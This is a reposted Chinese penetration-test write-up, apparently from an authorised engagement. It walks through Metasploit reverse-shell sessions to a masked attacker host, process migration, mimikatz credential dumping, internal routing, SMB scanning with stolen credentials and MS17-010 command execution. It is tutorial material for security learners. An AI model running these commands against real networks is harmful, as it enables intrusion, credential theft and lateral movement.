文章来源:先知社区 原文地址:https://xz.aliyun.com/t/6920 0x01 简介 本次测试为实战测试,测试环境是授权项目中的一部分,敏感信息内容已做打码处理,仅供讨论学习。由于本人在内网方面的掌握也是属于新手阶段,运用到的一些msf攻击手法也很基础,请各位表哥多多指教。 0x02 获得shell Getshell的过程没什么好说的,无非简单的后台弱口令到上传然后冰蝎连接getshell。获得shell后,模拟终端ping 8.8.8.8有返回包,说明该服务器与外网互通。 既然跟外网互通,那么可以尝试直接使用msf的exploit/multi/handler配合冰蝎反弹shell来获得session use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set lhost xxx.xxx.xxx.xxx set lport 5665 run 但是结果很不尽人意,没能够成功获得session。在使用冰蝎模拟终端收集信息过程中,发现本地有powershell进程。 再次打开msf,本次尝试使用web_delivery配合终端执行powershell指令来获得session。 use exploit/multi/script/web_deliveryset targets 2set payload windows/x64/meterpreter/reverse_httpsset lhost xxx.xxx.xxx.xxxset lport 4332set srvportrun 获得payload,使用冰蝎或者C刀模拟终端直接执行,成功获得session,执行getuid发现权限为system权限,省去了提权过程。 0x03 权限维持 为了获得一个持久稳定的高权限session,我们需要将当前的session进程迁移到一个持久、坚挺又稳定的进程上,防止突然暴毙(咳咳)。 我们使用ps查看当前进程,然后选中一个看起来比较持久的幸运儿spoolsv.exe(这是一个用来控制打印的进程,我遇到的机器基本都开启了此进程)。 migrate 进程号 getpid 0x04 内网信息搜集 不管是在什么类型的渗透环境下,信息搜集永远是不可缺少的一环,他决定了你渗透的效率,可以让你在渗透过程中少走很多弯路,毕竟在项目上尤其是红蓝攻防中,最缺的永远是时间。 接下来,查看IP信息以及arp缓存,查看网段分布情况: netstat -ano portfwd add -l 6666 -p 3389 -r 127.0.0.1 Load mimikatzWdigest 上传netpass查看rdp缓存,无果,但是发现系统有VNC,查看VNC相关文件发现新的网段信息,但是没有保存的连接信息,不过能获得新的网段信息也是知足了。 至此,信息收集部分其实也就差不多,接下来我们开始尝试横向移动。 0x05 横向移动 根据之前发现的网段信息以及服务器本机的路由信息,我们手动添加路由。 run autoroute -s 192.168.10.0/24 run autoroute -s 172.16.0.0/24 …… bg 退回到控制台,先使用auxiliary/scanner/smb/smb_version 模块扫描一下各网段的smb服务开启情况。use auxiliary/scanner/smb/smb_versionset rhosts 192.168.10.0/24set threads 10run 使用auxiliary/scanner/smb/psexec_loggedin_users模块配合已获得的两组账户密码进行横向。 use auxiliary/scanner/smb/psexec_loggedin_users set rhosts 192.168.10.0/24 set smbuser username set smbpass password set threads 5 run scanner 模块扫描一下哪些机器可能存在ms17-010的漏洞。use auxiliary/scanner/smb/smb_ms17_010set rhosts 192.168.10.0/24set thread 20run 此处试了很多机器,好多都打了补丁,不过也有漏网之鱼,此处单独拿一台示例: use auxiliary/admin/smb/ms17_010_command set rhost 192.168.10.18 set command whoami run 另外对于ms17-010,如果说打2003的机器,建议使用ms17_010_command模块进行执行命令获得session;其他的可以直接使用ms17_010_eternalblue或者ms17_010_psexec来直接获得session。 0x06 写在最后 咕某人提醒您:道路千万条,安全第一条;渗透不规范,亲人两行泪。 以上渗透测试过程纯属本人杜撰,渗透是不可能渗透的,这辈子都不可能渗透的。 最后,对于过程中有任何疑问都可以评论留言,我会的会一一回复,不会的也能让路过的表哥给康康,说不定表哥就给解决了呢,嘿嘿(发出了白嫖的笑声)。 |
|
来自: 新用户36657816 > 《待分类》